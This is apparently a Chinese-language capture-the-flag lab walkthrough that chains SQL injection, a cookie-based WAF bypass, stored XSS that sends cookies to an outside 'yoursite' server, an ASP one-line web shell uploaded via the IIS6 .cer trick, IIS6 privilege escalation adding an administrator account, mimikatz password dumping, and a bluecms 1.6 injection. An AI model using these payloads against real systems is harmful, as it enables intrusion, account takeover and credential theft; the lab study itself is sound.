第一章:为了女神小芳!
找到get参数id,使用"1'","1 or 1=1","1 or 1=2"测试,发现存在sql注入。最终payload为"id=1 and 1=2 union select 1,password from admin"。

第二章:遇到阻难!绕过WAF过滤!
在首页第一条新闻测试"shownews.asp?id=171",用"id=171 order by 1"测试,在11的时候报错,由此判断查询语句中有10个字段。再使用联合查询时,提示有非法字符,尝试绕过无果,转向cookie注入(asp中经常出现)。将get参数移至cookie处,网站正常返回数据1e94477e528407e0eb16baaebef396a.png
接着尝试联合查询,waf没有拦截,并得到回显位置1201b360b43da22973c77c280a5276f.png
盲猜表名(admin),列名(username,password),拿到admin密码登录后台,得到flag

第三章:为了更多的权限!留言板!
打开链接看到一个留言板,在所有字段中输入"<script>alert(1)</script>",出现弹窗,找到弹窗的位置再次留言"<script>window.open('http://yoursite/cookie.php?cookie='+document.cookie)</script>",接着在自己服务器日志中找到flag0b37a122551ba1aaaac626e070b69f4.png
第四章:进击!拿到Web最高权限!
用第三章拿到的cookie进入后台,在产品管理-添加产品有上传点,上传一句话木马(<%eval request("chopper")%>),被阻止,返回允许的后缀名,其中".cer"在iis6中默认是可以解析的,修改后缀名重新上传,网站对文件大小作有限制,文件后多加些0补充。最后用蚁剑连接c6dd5dd0e365d40cbcfe99e999cc2df.png
第五章:SYSTEM!POWER!
目前拿到的shell不能执行命令,自己上传一个cmd文件(注意版本),还有iis6.exe(iis6溢出提权,"systeminfo"查看补丁情况),使用'iis6.exe "net user test 123456 /add"','iis6.exe "net localgroup administrators test /add"'创建用户,加入管理员组,test用户已经存在了,换个用户名

使用"taskkill /svc"查看运行的服务,找到"TermService"服务和它的pid,再使用"netstat -ano"查看端口,找到pid对应的端口。远程桌面连接ddd3e1aee99fe96134bdf5a39298938.png
第六章:GET THE PASS!
在内存中找到administrator的密码,这里要用到"mimikatz.exe",打开输入两条命令:"privilege::debug","sekurlsa::logonpasswords"580f56acbd58e4ee7ae5a9b4833e1c3.png
萌新也能找CMS漏洞
bluecms1.6有sql注入漏洞,注入点在"bluecms/uploads/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,database()",拿到密码登录后台,有个修改模板的地方,模板的文件位置没找到,但有文件包含漏洞,修改"../../info.php"这个文件,插入一句话木马,拿到shell,但是没找到flag

最后一个爆破没做,这些网站全部在一台主机上,直接从数据库拿到flag提交了